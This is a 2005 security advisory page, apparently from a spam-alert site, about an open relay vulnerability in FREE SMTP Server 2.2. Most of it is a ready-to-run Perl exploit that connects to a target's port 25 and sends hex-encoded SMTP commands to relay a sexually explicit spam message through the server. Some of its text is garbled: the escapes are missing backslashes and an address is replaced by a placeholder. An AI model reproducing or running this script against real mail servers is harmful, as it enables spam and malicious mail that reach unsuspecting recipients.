Ads FREE SMTP Open Relay Vulnerability Monday, 05 September 2005 Summary "Free SMTP Server is a SMTP server program for Windows that lets you send email messages directly from your computer." Lack of proper relay checking allows attackers to send SPAM and/or malicious emails to users who uses the Free SMTP server. Credit: The information has been provided by Eric Basher. Details Vulnerable Systems: * FREE SMTP Server 2.2 The Open relay bug allow attackers to send Spam, malicious emails, Virus and others by supplying wrong sender address. Exploit: #!usr/bin/perl # # FREE SMTP Spam Filter Exploit # ------------------------------------ # Infam0us Gr0up - Securiti Research # # Info: infamous.2hell.com # Vendor URL: http://www.softstack.com/ # use IO::Socket; use Socket; print(" FREE SMTP Spam Filter Exploit "); print(" --------------------------------- "); # Changes to own feed $helo = "mail.test"; # HELO $mfrom = "< This email address is being protected from spam bots, you need Javascript enabled to view it >"; # MAIL FROM $rcpto = ""; # RCPT TO $date = "11 Feb 2099 12:07:10"; # Date $from = "Micro SEXs"; # From mailer $subject = "Check the new version.. ". "VICKY VETTEis HOT Editon.Check it OUT!!. Free Nude Shop. Sex,video,picture,toys and XXX Chat Adults live!!!". " Click Here"; # subject spammmer if($#ARGV < 0 | $#ARGV > 1) { die "usage: perl $0 [IP/host] Exam: perl $0 127.0.0.1 " }; $adr = $ARGV[0]; $prt = "25"; # Dont changes this one $act1 = "x48x45x4cx4f $helo"; $act2 = "x4dx41x49x4c x46x52x4fx4dx3a$mfrom"; $act3 = "x52x43x50x54 fx54x4fx3a$rcpto"; $act4 = "x44x41x54x41"; $act5 = "x44x61x74x65x3a $date"; $sub = "x46x72x6fx6dx3a $from". "x53x75x62x6ax65x63x74x3a $subjectx2e". "x51x55x49x54"; print "[+] Connect to $adr.. "; $remote = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$adr, PeerPort=>$prt, Reuse=>1) or die "[-] Error: cant connect to $adr:$prt "; print "[+] Connected! "; $remote->autoflush(1); print "[*] Send HELO.."; print $remote "$act1" or die " [-] Error: cant send xploit code "; sleep(1); print "[OK] "; print "[*] Send MAIL FROM.."; print $remote "$act2" or die " [-] Error: cant send xploit code "; sleep(1); print "[OK] "; print "[*] Send RCPT TO.."; print $remote "$act3" or die " [-] Error: cant send xploit code "; sleep(1); print "[OK] "; print "[*] Send DATA.."; print $remote "$act4" or die " [-] Error: cant send xploit code "; sleep(1); print "[OK] "; print "[*] Send DATE.."; print $remote "$act5" or die " [-] Error: cant send xploit code "; sleep(1); print "[OK] "; print "[*] Send Sub Mail.."; print $remote "$sub" or die " [-] Error: cant send xploit code "; print "[OK] "; print "[*] QUIT.. "; print "[+] MAIL SPAMWNED! "; close $remote; print "press any key to exit.. "; $bla= ; #EoF   < Prev   Next > [ Back ]

Main Menu SpamAlerts | Windows | Linux | Tutorials | Excell | WhitePapers | News | Spam | Virus Windows Focus VNews Vulnerability Hacking Sql Injection map Downloads Affiliates Online Store Free Ringtones Seo Directory IWebListin Jobs in India Freshers Jobs listings. Winkeyfinder

Copyright 2005-2007 SpamAlertz.com, Content on this site is From variuos other emails, and Advisories.